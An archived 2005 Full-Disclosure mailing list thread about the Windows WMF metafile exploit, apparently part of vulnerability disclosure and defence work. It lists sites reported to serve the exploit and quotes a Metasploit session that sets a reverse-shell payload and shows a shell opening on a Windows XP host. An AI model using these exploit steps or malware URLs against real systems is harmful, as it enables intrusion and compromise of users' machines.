Network Security: Detailed info on RE: [Full-disclosure] Someone wasted a nice bug on spyware...

Subject:	RE: [Full-disclosure] Someone wasted a nice bug on spyware...
Date:	Tue, 27 Dec 2005 23:02:17 -0500

We are seeing a lot of website picking this exploit up.

Examples: DON'T CLICK

Crackz.ws
unionseek.com/d/t1/wmf_exp.htm
beehappyy.biz/parthner3/xpl.wmf
http://www.tfcco.com/xpl.wmf
Iframeurl.biz

Cheers,

Eric Sites 
VP of Research & Development
Sunbelt Software

email: eric@sunbelt-software.com 
Voice: 1-727-562-0101 x 276
Cell: 1-727-637-2414
Fax: 1-727-562-5199
Web: http://www.sunbelt-software.com
Physical Address:
101 N Garden Ave, 
Suite 120
Clearwater, FL, 33755
United States

-----Original Message-----
From: full-disclosure-bounces@lists.grok.org.uk
[mailto:full-disclosure-bounces@lists.grok.org.uk] On Behalf Of H D
Moore
Sent: Tuesday, December 27, 2005 10:57 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Someone wasted a nice bug on spyware...

In reference to:
http://www.securityfocus.com/archive/1/420288/30/0/threaded

I ported the exploit to the Metasploit Framework in case anyone wants to

test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metaf
ile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1/SP2 and Windows 2003 SP0/SP1.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit

[*] Starting Reverse Handler.
[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf
[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP
[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>  


On Tuesday 27 December 2005 14:20, noemailpls@noemail.ziper wrote:

Warning the following URL successfully exploited a fully patched
windows xp system with a freshly updated norton anti virus.

unionseek.com/d/t1/wmf_exp.htm

The url runs a .wmf and executes the virus, f-secure will pick up the
virus norton will not.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

<Prev in Thread]	Current Thread	[Next in Thread>
[Full-disclosure] Someone wasted a nice bug on spyware..., H D Moore Re: [Full-disclosure] Someone wasted a nice bug on spyware..., Jerome Athias Re: [Full-disclosure] Someone wasted a nice bug on spyware..., Morning Wood Re: [Full-disclosure] Someone wasted a nice bug on spyware..., Nick FitzGerald Re: [Full-disclosure] Someone wasted a nice bug on spyware..., H D Moore RE: [Full-disclosure] Someone wasted a nice bug on spyware..., Eric Sites <= RE: [Full-disclosure] Someone wasted a nice bug on spyware..., Paul Re: [Full-disclosure] Someone wasted a nice bug on spyware..., Tomasz Kokowski Re: [Full-disclosure] Someone wasted a nice bug on spyware..., ad@heapoverflow.com

Previous by Date:	[Full-disclosure] Someone wasted a nice bug on spyware..., H D Moore
Next by Date:	Re: [Full-disclosure] "I never said Moreover" Robert Lemos, InfoSecBOFH
Previous by Thread:	Re: [Full-disclosure] Someone wasted a nice bug on spyware..., H D Moore
Next by Thread:	RE: [Full-disclosure] Someone wasted a nice bug on spyware..., Paul
Indexes:	[Date] [Thread] [Top] [All Lists]